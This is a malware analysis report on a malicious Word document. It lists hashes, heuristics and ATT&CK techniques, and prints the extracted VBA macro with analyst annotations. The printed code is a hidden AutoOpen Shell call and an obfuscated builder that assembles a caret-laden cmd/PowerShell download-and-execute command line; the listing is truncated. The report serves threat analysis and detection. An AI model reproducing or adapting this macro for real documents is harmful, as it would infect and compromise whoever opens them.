Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 df5c4b1ae18fe29c…

MALICIOUS

Office (OLE)

74.2 KB · Created: 2018-09-20 07:38:00 · Authoring application: Microsoft Office Word · First seen: 2019-05-16
MD5: f9731c12baf70ee6329d94da7ed5f6cd SHA-1: a8a5c3972885d425e7ded66ab44251b403f03bc9 SHA-256: df5c4b1ae18fe29ca28e7ab70d5c3a263b5db3e2238d6cbd4c7b0f697c4bd864
82 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic · T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. Its AutoOpen macro is designed to execute a shell command, most likely to download and run a second-stage payload. The script's obfuscation prevents a more detailed static determination of its exact behaviour or download destination.

Heuristics 4

  • VBA macros detected · medium · 1 related finding · OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro · high · OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker · medium · OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL · info · EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main — found in document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas · vba-macro · oletools.olevba.extract_macros (decoded VBA source) · 11627 bytes
SHA-256: 4aff0af47a58af25e460d8d25bae9ee1f7a1301bb4f1f495a867249d0008562b
Preview script
First 1,000 lines of the extracted script
' Module header attributes as recovered by olevba. The random-looking module
' name matches the generated identifiers used throughout the macro body.
Attribute VB_Name = "qObMCbz"
' VB_Base naming ThisDocument together with VB_PredeclaredId = True mark this
' as a document-type module (one with a predeclared default instance) rather
' than a plain standard module; the remaining attributes are the usual
' document-module defaults — presumably untouched by the author, confirm
' against a clean Word document if it matters for clustering.
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' AutoOpen runs automatically when Word opens the document, which is what the
' OLE_VBA_AUTOOPEN heuristic flags. Within this Sub the only statement with an
' observable effect is the Shell call; every array element assigned here is
' never read again inside the Sub, and the strings being sliced (DUAUwXz,
' ttcqN, RpEMv, GfXpUG) are not declared anywhere in the visible listing, so
' the Left/Right/Mid/MidB arithmetic looks like padding meant to bury the one
' live line and frustrate static review (analyst assumption — confirm against
' the full 11627-byte macros.bas).
Sub AutoOpen()
' Passed to Shell as its WindowStyle argument below; 0 is vbHide, so the
' spawned process gets no visible window.
Const IXPzQbsjcKO = 0
   Dim hwzHPr(5)
hwzHPr(0) = Left(DUAUwXz, 196) + Right(ttcqN, 266)
hwzHPr(1) = Mid(RpEMv, 643, 429) + Mid(RpEMv, 643, 429)
hwzHPr(2) = Right(ttcqN, 266) + Mid(RpEMv, 643, 429) + Right(ttcqN, 266) + Left(DUAUwXz, 196)
hwzHPr(3) = Left(DUAUwXz, 196) + MidB(GfXpUG, 200, 969)
hwzHPr(4) = Left(DUAUwXz, 196) + MidB(GfXpUG, 200, 969) + MidB(GfXpUG, 200, 969) + MidB(GfXpUG, 200, 969)
   Dim Fnkcd(2)
Fnkcd(0) = Left(DUAUwXz, 196) + Right(ttcqN, 266) + MidB(GfXpUG, 200, 969) + Left(DUAUwXz, 196)
Fnkcd(1) = MidB(GfXpUG, 200, 969) + MidB(GfXpUG, 200, 969)
   Dim jBdVf(2)
jBdVf(0) = MidB(GfXpUG, 200, 969) + Left(DUAUwXz, 196)
jBdVf(1) = Mid(RpEMv, 643, 429) + MidB(GfXpUG, 200, 969)
   Dim NiwBjp(4)
NiwBjp(0) = Left(DUAUwXz, 196) + Left(DUAUwXz, 196)
NiwBjp(1) = Left(DUAUwXz, 196) + Right(ttcqN, 266)
NiwBjp(2) = Right(ttcqN, 266) + Left(DUAUwXz, 196) + Left(DUAUwXz, 196) + Mid(RpEMv, 643, 429)
NiwBjp(3) = Right(ttcqN, 266) + Left(DUAUwXz, 196)
   Dim ZWAKlH(2)
ZWAKlH(0) = Mid(RpEMv, 643, 429) + Right(ttcqN, 266) + Right(ttcqN, 266) + Mid(RpEMv, 643, 429)
ZWAKlH(1) = Right(ttcqN, 266) + Right(ttcqN, 266) + Left(DUAUwXz, 196) + MidB(GfXpUG, 200, 969)
' The live statement. Four string-returning functions are concatenated into a
' single command line and launched hidden. Only vHSAvTouvRW is visible in this
' preview (next module): its first fragments assemble "cmd /V^:^ON/C" — the
' Chr(CleanString(6 + 6 + 1 + 15 + 71)) term is Chr(99) = "c" if CleanString
' passes the numeric string through — i.e. a caret-obfuscated cmd.exe
' invocation with delayed variable expansion, the carets being consumed by
' cmd's own parser. AnnGNBonG, sLjwfHYw and JpVWGpBXz are outside the preview,
' so the full command line is not recoverable from here. The "@" after Shell
' is a type-declaration character; presumably tolerated by the VBA parser or
' an artefact of olevba's decoding — verify against the raw VBA stream before
' using it in a signature.
' Detection angle: as far as the preview shows, this surfaces as the Word
' process spawning cmd.exe with a caret-heavy /V:ON command line.
Shell@ vHSAvTouvRW + AnnGNBonG + sLjwfHYw + JpVWGpBXz, IXPzQbsjcKO
' Further filler after the Shell call; likewise never read within this Sub.
   Dim jtpjwJ(4)
jtpjwJ(0) = Mid(RpEMv, 643, 429) + Right(ttcqN, 266)
jtpjwJ(1) = MidB(GfXpUG, 200, 969) + Mid(RpEMv, 643, 429)
jtpjwJ(2) = MidB(GfXpUG, 200, 969) + Mid(RpEMv, 643, 429) + Mid(RpEMv, 643, 429) + Mid(RpEMv, 643, 429)
jtpjwJ(3) = Right(ttcqN, 266) + Mid(RpEMv, 643, 429)
   Dim voznIz(3)
voznIz(0) = Mid(RpEMv, 643, 429) + Left(DUAUwXz, 196)
voznIz(1) = Right(ttcqN, 266) + Left(DUAUwXz, 196)
voznIz(2) = Mid(RpEMv, 643, 429) + Left(DUAUwXz, 196)
End Sub


' Second module recovered from the same VBA project. Its only procedure visible
' in this preview, vHSAvTouvRW, is the first of the four string builders
' concatenated into AutoOpen's Shell command line; its body is cut off at the
' end of the preview, so the full command cannot be reconstructed from here.
Attribute VB_Name = "qhXZFCbCEEzt"
Function vHSAvTouvRW()
Dim wdPQj(5)
wdPQj(0) = Mid(RpEMv, 643, 429) + Mid(RpEMv, 643, 429)
wdPQj(1) = Right(ttcqN, 266) + Left(DUAUwXz, 196)
wdPQj(2) = Right(ttcqN, 266) + Mid(RpEMv, 643, 429)
wdPQj(3) = Mid(RpEMv, 643, 429) + Mid(RpEMv, 643, 429) + MidB(GfXpUG, 200, 969) + Left(DUAUwXz, 196)
wdPQj(4) = Right(ttcqN, 266) + Mid(RpEMv, 643, 429)
ErClKuBCiAn = CStr(Chr(CleanString(6 + 6 + 1 + 15 + 71))) + "m" + "d /V^:^O" + "N/" + CStr(Chr(CleanString(4 + 4 + 1 + 10 + 48))) + CStr(Chr(CleanString(2 + 2 + 0 + 4 + 26))) + "^s" + "e^t ^7" + "d= ^  ^    ^" + " ^ ^ ^ ^    " + "  " + "}}{^h" + CStr(Chr(CleanString(6 + 6 + 1 + 15 + 71))) + "t^"
Dim cSPQB(2)
cSPQB(0) = Right(ttcqN, 266) + Right(ttcqN, 266)
cSPQB(1) = Mid(RpEMv, 643, 429) + Right(ttcqN, 266) + Left(DUAUwXz, 196) + Right(ttcqN, 266)
BIukj = "a" + CStr(Chr(CleanString(6 + 6 + 1 + 15 + 71))) + "}^;^ka^erb" + "^;^b^iK$^ ^m" + "e^t^" + "I^-" + "^e^k^ovn" + "^I^;)b^i" + "^K^$ ,v^i^i$" + "(^el^i^Fdao" + "^ln^woD^." + CStr(Chr(CleanString(4 + 4 + 1 + 10 + 48))) + "LJ^${yr^t" + "{)" + CStr(Chr(CleanString(6 + 6 + 1 + 15 + 71))) + "TY$ n^i" + "^ v^i^i^$(^" + "h" + CStr(Chr(CleanString(6 + 6 + 1 + 15 + 71))) + "a^"
Dim pawzlF(5)
pawzlF(0) = Right(ttcqN, 266) + Left(DUAUwXz, 196)
pawzlF(1) = Left(DUAUwXz, 196) + Mid(RpEMv, 643, 429) + Right(ttcqN, 266) + MidB(GfXpUG, 200, 969)
pawzlF(2) = Left(DUAUwXz, 196) + Right(ttcqN, 266)
pawzlF(3) = Left(DUAUwXz, 196) + Mid(RpEMv, 643, 429) + Right(ttcqN, 266) + Mid(RpEMv, 643, 429)
pawzlF(4) = Right(ttcqN, 266) + Mid(RpEMv, 643, 429)
   Dim JsazwC(2)
JsazwC(0) = Right(ttcqN, 266) + MidB(GfXpUG, 200, 969) + MidB(GfXpUG, 200, 969) + Right(ttcqN, 266)
JsazwC(1) = Mid(RpEMv, 643, 429) + Left(DUAUwXz, 196)
   Dim vjTCX(4)
vjTCX(0) = MidB(GfXpUG, 200, 969) + Right(ttcqN, 266) + MidB(GfXpUG, 200, 969) + Mid(RpEMv, 643, 429)
vjTCX(1) = Mid(RpEMv, 643, 429) + Mid(RpEMv, 643, 429)
vjTCX(2) = Mid(RpEMv, 643, 429) + Mid(RpEMv, 643, 429)
vjTCX(3) = Mid(RpEMv, 643, 429) + MidB(GfXpUG, 200
... (truncated)